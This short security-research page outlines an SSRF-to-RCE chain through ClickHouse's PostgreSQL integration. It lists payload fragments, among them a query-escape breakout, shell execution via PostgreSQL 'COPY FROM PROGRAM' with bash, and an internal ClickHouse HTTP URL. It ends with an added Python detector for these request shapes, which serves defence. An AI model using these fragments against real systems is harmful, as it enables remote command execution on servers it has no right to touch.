ClickHouse PostgreSQL SSRF to RCE Chain Testing
Security researchers demonstrate exploiting ClickHouse's PostgreSQL integration to chain Server-Side Request Forgery vulnerabilities with Remote Code Execution
Security researchers testing ClickHouse-PostgreSQL integrations reproduce SSRF-to-RCE chains using documented exploit techniques.
ClickHouse PostgreSQL Function Testing:
- SELECT * FROM postgresql('host:5432','db','table','user','pass') - Tests basic connectivity
- query=SELECT+*+FROM+postgresql(...) - URL-encodes ClickHouse queries for SSRF
- Check escaping: "posthog_use')) - Injects closing parentheses to break out
PostgreSQL Command Execution:
- COPY table FROM PROGRAM $$bash -c "command"$$ - Executes shell commands
- CREATE TABLE cmd_exec(cmd_output text) - Captures command output
- Test internally: http://clickhouse:8123/?query=... - Bypasses external firewalls
Vulnerability Resources:
- Visit https://github.com/ClickHouse/ClickHouse/security/advisories for escaping bug details
- Review PostgreSQL COPY documentation at https://www.postgresql.org/docs/current/sql-copy.html
This chain exploits webhook SSRF, ClickHouse SQL injection, and PostgreSQL’s PROGRAM feature, demonstrating why defense-in-depth prevents single-point failures.
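A defender-side check for the request shapes listed above, as an added example that is not part of the original page: it decodes URLs that a webhook worker is asked to fetch and flags ClickHouse HTTP ?query= targets, the postgresql() table function, and COPY ... FROM PROGRAM. The rule names, the port constant and the sample URLs are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

CLICKHOUSE_HTTP_PORT = 8123  # port used in the page's internal URL
PG_TABLE_FN = re.compile(r"\bpostgresql\s*\(", re.I)
COPY_PROGRAM = re.compile(r"\bcopy\b.*?\bfrom\s+program\b", re.I | re.S)

# Constructed sample URLs, built from the fragments shown on the page.
SAMPLE_REQUESTS = [
    "http://clickhouse:8123/?query=SELECT+count()+FROM+events",
    "http://clickhouse:8123/?query=SELECT+*+FROM+postgresql('host:5432','db','table','user','pass')",
    "http://clickhouse:8123/?query=COPY+cmd_exec+FROM+PROGRAM+%24%24...%24%24",
    "http://clickhouse:8123/?query=COPY%2520cmd_exec%2520FROM%2520PROGRAM",  # double-encoded
    "https://hooks.example.com/notify?query=status",
]

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding so double-encoded text is still matched."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def findings(url):
    """Return the rule names that fire for one outbound request URL."""
    parts = urlsplit(url)
    queries = [fully_decode(q) for q in parse_qs(parts.query).get("query", [])]
    hits = []
    # Any query sent to the ClickHouse HTTP port from a webhook worker is suspect.
    if parts.port == CLICKHOUSE_HTTP_PORT and queries:
        hits.append("clickhouse-http-query")
    for q in queries:
        if PG_TABLE_FN.search(q):
            hits.append("postgresql-table-function")
        if COPY_PROGRAM.search(q):
            hits.append("copy-from-program")
    return hits

if __name__ == "__main__":
    for url in SAMPLE_REQUESTS:
        print(findings(url) or ["ok"], url)
```

A hit on the first rule alone already shows the worker reaching an internal database endpoint, which is the link in the chain that egress filtering can break.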